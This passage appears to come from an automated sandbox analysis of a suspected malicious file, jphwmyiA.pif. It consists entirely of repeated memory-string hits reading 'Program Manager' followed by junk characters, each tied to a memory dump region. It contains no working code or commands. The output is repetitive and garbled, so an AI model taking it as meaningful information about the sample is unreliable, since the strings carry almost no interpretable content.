                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qtG!
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]ql+
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.00000000211F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q8a$!
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]ql)
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q(Pt
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q(QV
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qlV
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q,[!
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qlR
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q4)A!
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]ql]
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q\j*!
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qlF7!
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]ql[
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q8qC!
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q<zX
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q<yv
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.000000002164A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qpDi!
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qlF
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q0-V!
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qlD
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qh4a!
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qX"(!
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.00000000211F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qHh!!
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q0bU
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qlP
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qlM
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qxqC
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qlx
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q@4S!
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q`<J
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qxc-!
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qPM4!
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q`;h
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qlv
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022D79000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qlq
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]ql|
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.000000002164A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qH.p!
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qle
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qxmY
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qlj
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q8)3!
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q|&K!
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qxnE
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qp$
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qD0>!
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qp"
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qHx@!
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qlVB
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qdEj
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.000000002164A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qxam!
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qlc!
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qtc;!
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q(U@
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qh<
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qh7
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.000000002164A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q4Rq!
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qLx2!
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qh"
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q<~B
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qh
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qpgP!
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qH00!
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qh+
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q0T?!
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qhR
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qhO
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q4nL
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q4mj
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qh[
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qhW
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022D79000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qhA
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qT*w
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qh>
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qhK
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q<~i
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.00000000228EC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qhE
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qhF
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q4jb
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022D79000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qhs
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C285000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qdI1
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q(7;!
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qhp
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qh{
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C285000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qX1.
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.00000000228EC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qhz
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qX>\!
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q {Z!
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q4T1!
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qhb
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q(SK
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C285000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qlZ0
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qh`
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q<{a
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qh]
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qhg
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.000000002164A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q|6o!
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q<{k
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q<|M
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qt<R!
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qdJ6
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q0dJ
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qxs8
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qlyB!
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qh}
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]ql[5
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qd+
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qd5
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qd3
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q8iK
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q8hi
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q,Pf
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qd'
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.00000000228EC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qd$
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qd"
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qdM
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q@zJ
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qdK
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q@yh
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qtLd!
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.00000000228EC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qdJ
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qdX
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.000000002164A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q|\l!
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qtbO!
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qd@
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qd>
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qd<
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q<yP!
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022D79000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qdF
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3759044555.0000000022D79000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qdC
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qD51!
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q$?d!
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qdp
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3759044555.0000000022D79000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qdl
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qdi
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q 6G
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q4^]
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qdu
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qds
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qhE5
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qd`
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q4_I
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q4^g
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qdY
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q|n7
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qdg
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q8gV
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qdb
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q4\L!
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qpb]!
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qd}
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q 8<
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qh
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qlQv
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qlRX
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qdJZ!
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022D79000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q`0
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q`9s
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.00000000211F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q|V!!
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.000000002164A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q<Vi!
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q`:U
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qDcI!
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qT"R
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q`$
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022D79000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q`"
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qtcW
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qdBl
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qxkd
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022D79000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q`H
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q`E
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q\?:!
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q`Q
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qX+K
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.00000000228EC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q`O
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qlSa
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qX*i
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qlq'!
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q`M
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q$|8!
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.000000002164A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qp*r!
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.000000002164A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q(zj!
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q`:
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q jb!
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q ?!
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q`5
